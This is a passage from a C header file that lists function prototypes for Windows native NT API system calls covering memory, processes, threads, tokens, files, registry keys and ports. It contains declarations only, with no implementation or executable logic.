KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\r\n\tOUT PVOID KeyValueInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtFindAtom(\r\n\tIN PWSTR AtomName OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PUSHORT Atom OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryDefaultLocale(\r\n\tIN BOOLEAN UserProfile,\r\n\tOUT PLCID DefaultLocaleId);\r\n\r\nEXTERN_C NTSTATUS NtQueryKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN KEY_INFORMATION_CLASS KeyInformationClass,\r\n\tOUT PVOID KeyInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName,\r\n\tIN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\r\n\tOUT PVOID KeyValueInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Protect);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationProcess(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PROCESSINFOCLASS ProcessInformationClass,\r\n\tOUT PVOID ProcessInformation,\r\n\tIN ULONG ProcessInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects32(\r\n\tIN ULONG ObjectCount,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteFileGather(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_SEGMENT_ELEMENT SegmentArray,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateKey(\r\n\tOUT PHANDLE KeyHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN ULONG TitleIndex,\r\n\tIN PUNICODE_STRING Class OPTIONAL,\r\n\tIN ULONG CreateOptions,\r\n\tOUT PULONG Disposition OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFreeVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG FreeType);\r\n\r\nEXTERN_C NTSTATUS NtImpersonateClientOfPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message);\r\n\r\nEXTERN_C NTSTATUS NtReleaseMutant(\r\n\tIN HANDLE MutantHandle,\r\n\tOUT PULONG PreviousCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN TOKEN_INFORMATION_CLASS TokenInformationClass,\r\n\tOUT PVOID TokenInformation,\r\n\tIN ULONG TokenInformationLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtRequestWaitReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE RequestMessage,\r\n\tOUT PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtQueryVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN MEMORY_INFORMATION_CLASS MemoryInformationClass,\r\n\tOUT PVOID MemoryInformation,\r\n\tIN SIZE_T MemoryInformationLength,\r\n\tOUT PSIZE_T ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenThreadToken(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN BOOLEAN OpenAsSelf,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtQueryInformationThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN THREADINFOCLASS ThreadInformationClass,\r\n\tOUT PVOID ThreadInformation,\r\n\tIN ULONG ThreadInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN PCLIENT_ID ClientId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtMapViewOfSection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID BaseAddress,\r\n\tIN ULONG ZeroBits,\r\n\tIN SIZE_T CommitSize,\r\n\tIN OUT PLARGE_INTEGER SectionOffset OPTIONAL,\r\n\tIN OUT PSIZE_T ViewSize,\r\n\tIN SECTION_INHERIT InheritDisposition,\r\n\tIN ULONG AllocationType,\r\n\tIN ULONG Win32Protect);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PBOOLEAN AccessStatus,\r\n\tOUT PBOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSection(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress);\r\n\r\nEXTERN_C NTSTATUS NtReplyWaitReceivePortEx(\r\n\tIN HANDLE PortHandle,\r\n\tOUT PULONG PortContext OPTIONAL,\r\n\tIN PPORT_MESSAGE ReplyMessage OPTIONAL,\r\n\tOUT PPORT_MESSAGE ReceiveMessage,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateProcess(\r\n\tIN HANDLE ProcessHandle OPTIONAL,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtSetEventBoostPriority(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtReadFileScatter(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_SEGMENT_ELEMENT SegmentArray,\r\n\tIN ULONG Length,\r\n\tIN PLARGE_INTEGER ByteOffset OPTIONAL,\r\n\tIN PULONG Key OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenThreadTokenEx(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN BOOLEAN OpenAsSelf,\r\n\tIN ULONG HandleAttributes,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcessTokenEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tOUT PHANDLE TokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtQueryPerformanceCounter(\r\n\tOUT PLARGE_INTEGER PerformanceCounter,\r\n\tOUT PLARGE_INTEGER PerformanceFrequency OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtEnumerateKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN ULONG Index,\r\n\tIN KEY_INFORMATION_CLASS KeyInformationClass,\r\n\tOUT PVOID KeyInformation OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength);\r\n\r\nEXTERN_C NTSTATUS NtOpenFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG OpenOptions);\r\n\r\nEXTERN_C NTSTATUS NtDelayExecution(\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER DelayInterval);\r\n\r\nEXTERN_C NTSTATUS NtQueryDirectoryFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FileInformation,\r\n\tIN ULONG Length,\r\n\tIN FILE_INFORMATION_CLASS FileInformationClass,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PUNICODE_STRING FileName OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN OUT PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtQueryTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN TIMER_INFORMATION_CLASS TimerInformationClass,\r\n\tOUT PVOID TimerInformation,\r\n\tIN ULONG TimerInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFsControlFile(\r\n\tIN HANDLE FileHandle,\r\n\tIN HANDLE Event OPTIONAL,\r\n\tIN PIO_APC_ROUTINE ApcRoutine OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG FsControlCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtWriteVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN PVOID Buffer,\r\n\tIN SIZE_T NumberOfBytesToWrite,\r\n\tOUT PSIZE_T NumberOfBytesWritten OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCloseObjectAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN BOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtDuplicateObject(\r\n\tIN HANDLE SourceProcessHandle,\r\n\tIN HANDLE SourceHandle,\r\n\tIN HANDLE TargetProcessHandle OPTIONAL,\r\n\tOUT PHANDLE TargetHandle OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN ULONG HandleAttributes,\r\n\tIN ULONG Options);\r\n\r\nEXTERN_C NTSTATUS NtQueryAttributesFile(\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PFILE_BASIC_INFORMATION FileInformation);\r\n\r\nEXTERN_C NTSTATUS NtClearEvent(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtReadVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tOUT PVOID Buffer,\r\n\tIN SIZE_T BufferSize,\r\n\tOUT PSIZE_T NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenEvent(\r\n\tOUT PHANDLE EventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAdjustPrivilegesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN DisableAllPrivileges,\r\n\tIN PTOKEN_PRIVILEGES NewState OPTIONAL,\r\n\tIN ULONG BufferLength,\r\n\tOUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtDuplicateToken(\r\n\tIN HANDLE ExistingTokenHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN BOOLEAN EffectiveOnly,\r\n\tIN TOKEN_TYPE TokenType,\r\n\tOUT PHANDLE NewTokenHandle);\r\n\r\nEXTERN_C NTSTATUS NtContinue(\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN BOOLEAN TestAlert);\r\n\r\nEXTERN_C NTSTATUS NtQueryDefaultUILanguage(\r\n\tOUT PLANGID DefaultUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtYieldExecution();\r\n\r\nEXTERN_C NTSTATUS NtAddAtom(\r\n\tIN PWSTR AtomName OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PUSHORT Atom OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateEvent(\r\n\tOUT PHANDLE EventHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN EVENT_TYPE EventType,\r\n\tIN BOOLEAN InitialState);\r\n\r\nEXTERN_C NTSTATUS NtQueryVolumeInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PVOID FsInformation,\r\n\tIN ULONG Length,\r\n\tIN FSINFOCLASS FsInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtCreateSection(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN PLARGE_INTEGER MaximumSize OPTIONAL,\r\n\tIN ULONG SectionPageProtection,\r\n\tIN ULONG AllocationAttributes,\r\n\tIN HANDLE FileHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtFlushBuffersFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtApphelpCacheControl(\r\n\tIN APPHELPCACHESERVICECLASS Service,\r\n\tIN PVOID ServiceData);\r\n\r\nEXTERN_C NTSTATUS NtCreateProcessEx(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN ULONG Flags,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL,\r\n\tIN ULONG JobMemberLevel);\r\n\r\nEXTERN_C NTSTATUS NtCreateThread(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tOUT PCLIENT_ID ClientId,\r\n\tIN PCONTEXT ThreadContext,\r\n\tIN PUSER_STACK InitialTeb,\r\n\tIN BOOLEAN CreateSuspended);\r\n\r\nEXTERN_C NTSTATUS NtIsProcessInJob(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE JobHandle OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtProtectVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PVOID* BaseAddress,\r\n\tIN OUT PSIZE_T RegionSize,\r\n\tIN ULONG NewProtect,\r\n\tOUT PULONG OldProtect);\r\n\r\nEXTERN_C NTSTATUS NtQuerySection(\r\n\tIN HANDLE SectionHandle,\r\n\tIN SECTION_INFORMATION_CLASS SectionInformationClass,\r\n\tOUT PVOID SectionInformation,\r\n\tIN ULONG SectionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN OUT PULONG PreviousSuspendCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtReadRequestData(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Message,\r\n\tIN ULONG DataEntryIndex,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG BufferSize,\r\n\tOUT PULONG NumberOfBytesRead OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateFile(\r\n\tOUT PHANDLE FileHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PLARGE_INTEGER AllocationSize OPTIONAL,\r\n\tIN ULONG FileAttributes,\r\n\tIN ULONG ShareAccess,\r\n\tIN ULONG CreateDisposition,\r\n\tIN ULONG CreateOptions,\r\n\tIN PVOID EaBuffer OPTIONAL,\r\n\tIN ULONG EaLength);\r\n\r\nEXTERN_C NTSTATUS NtQueryEvent(\r\n\tIN HANDLE EventHandle,\r\n\tIN EVENT_INFORMATION_CLASS EventInformationClass,\r\n\tOUT PVOID EventInformation,\r\n\tIN ULONG EventInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWriteRequestData(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE Request,\r\n\tIN ULONG DataIndex,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ResultLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenDirectoryObject(\r\n\tOUT PHANDLE DirectoryHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PBOOLEAN GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtWaitForMultipleObjects(\r\n\tIN ULONG Count,\r\n\tIN PHANDLE Handles,\r\n\tIN WAIT_TYPE WaitType,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationObject(\r\n\tIN HANDLE Handle,\r\n\tIN OBJECT_INFORMATION_CLASS ObjectInformationClass,\r\n\tIN PVOID ObjectInformation,\r\n\tIN ULONG ObjectInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtCancelIoFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock);\r\n\r\nEXTERN_C NTSTATUS NtTraceEvent(\r\n\tIN HANDLE TraceHandle,\r\n\tIN ULONG Flags,\r\n\tIN ULONG FieldSize,\r\n\tIN PVOID Fields);\r\n\r\nEXTERN_C NTSTATUS NtPowerInformation(\r\n\tIN POWER_INFORMATION_LEVEL InformationLevel,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength);\r\n\r\nEXTERN_C NTSTATUS NtSetValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING ValueName,\r\n\tIN ULONG TitleIndex OPTIONAL,\r\n\tIN ULONG Type,\r\n\tIN PVOID SystemData,\r\n\tIN ULONG DataSize);\r\n\r\nEXTERN_C NTSTATUS NtCancelTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tOUT PBOOLEAN CurrentState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime,\r\n\tIN PTIMER_APC_ROUTINE TimerApcRoutine OPTIONAL,\r\n\tIN PVOID TimerContext OPTIONAL,\r\n\tIN BOOLEAN ResumeTimer,\r\n\tIN LONG Period OPTIONAL,\r\n\tOUT PBOOLEAN PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByType(\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ULONG DesiredAccess,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeResultList(\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tOUT PPRIVILEGE_SET PrivilegeSet,\r\n\tIN OUT PULONG PrivilegeSetLength,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarm(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PULONG GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarmByHandle(\r\n\tIN PUNICODE_STRING SubsystemName,\r\n\tIN PVOID HandleId OPTIONAL,\r\n\tIN HANDLE ClientToken,\r\n\tIN PUNICODE_STRING ObjectTypeName,\r\n\tIN PUNICODE_STRING ObjectName,\r\n\tIN PSECURITY_DESCRIPTOR SecurityDescriptor,\r\n\tIN PSID PrincipalSelfSid OPTIONAL,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN AUDIT_EVENT_TYPE AuditType,\r\n\tIN ULONG Flags,\r\n\tIN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,\r\n\tIN ULONG ObjectTypeListLength,\r\n\tIN PGENERIC_MAPPING GenericMapping,\r\n\tIN BOOLEAN ObjectCreation,\r\n\tOUT PACCESS_MASK GrantedAccess,\r\n\tOUT PULONG AccessStatus,\r\n\tOUT PULONG GenerateOnClose);\r\n\r\nEXTERN_C NTSTATUS NtAcquireProcessActivityReference();\r\n\r\nEXTERN_C NTSTATUS NtAddAtomEx(\r\n\tIN PWSTR AtomName,\r\n\tIN ULONG Length,\r\n\tIN PRTL_ATOM Atom,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtAddBootEntry(\r\n\tIN PBOOT_ENTRY BootEntry,\r\n\tOUT PULONG Id OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAddDriverEntry(\r\n\tIN PEFI_DRIVER_ENTRY DriverEntry,\r\n\tOUT PULONG Id OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAdjustGroupsToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN ResetToDefault,\r\n\tIN PTOKEN_GROUPS NewState OPTIONAL,\r\n\tIN ULONG BufferLength OPTIONAL,\r\n\tOUT PTOKEN_GROUPS PreviousState OPTIONAL,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtAdjustTokenClaimsAndDeviceGroups(\r\n\tIN HANDLE TokenHandle,\r\n\tIN BOOLEAN UserResetToDefault,\r\n\tIN BOOLEAN DeviceResetToDefault,\r\n\tIN BOOLEAN DeviceGroupsResetToDefault,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState OPTIONAL,\r\n\tIN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState OPTIONAL,\r\n\tIN PTOKEN_GROUPS NewDeviceGroupsState OPTIONAL,\r\n\tIN ULONG UserBufferLength,\r\n\tOUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState OPTIONAL,\r\n\tIN ULONG DeviceBufferLength,\r\n\tOUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState OPTIONAL,\r\n\tIN ULONG DeviceGroupsBufferLength,\r\n\tOUT PTOKEN_GROUPS PreviousDeviceGroups OPTIONAL,\r\n\tOUT PULONG UserReturnLength OPTIONAL,\r\n\tOUT PULONG DeviceReturnLength OPTIONAL,\r\n\tOUT PULONG DeviceGroupsReturnBufferLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlertResumeThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG PreviousSuspendCount OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtAlertThread(\r\n\tIN HANDLE ThreadHandle);\r\n\r\nEXTERN_C NTSTATUS NtAlertThreadByThreadId(\r\n\tIN ULONG ThreadId);\r\n\r\nEXTERN_C NTSTATUS NtAllocateLocallyUniqueId(\r\n\tOUT PLUID Luid);\r\n\r\nEXTERN_C NTSTATUS NtAllocateReserveObject(\r\n\tOUT PHANDLE MemoryReserveHandle,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN MEMORY_RESERVE_TYPE Type);\r\n\r\nEXTERN_C NTSTATUS NtAllocateUserPhysicalPages(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PULONG NumberOfPages,\r\n\tOUT PULONG UserPfnArray);\r\n\r\nEXTERN_C NTSTATUS NtAllocateUuids(\r\n\tOUT PLARGE_INTEGER Time,\r\n\tOUT PULONG Range,\r\n\tOUT PULONG Sequence,\r\n\tOUT PUCHAR Seed);\r\n\r\nEXTERN_C NTSTATUS NtAllocateVirtualMemoryEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN OUT PPVOID lpAddress,\r\n\tIN ULONG_PTR ZeroBits,\r\n\tIN OUT PSIZE_T pSize,\r\n\tIN ULONG flAllocationType,\r\n\tIN OUT PVOID DataBuffer 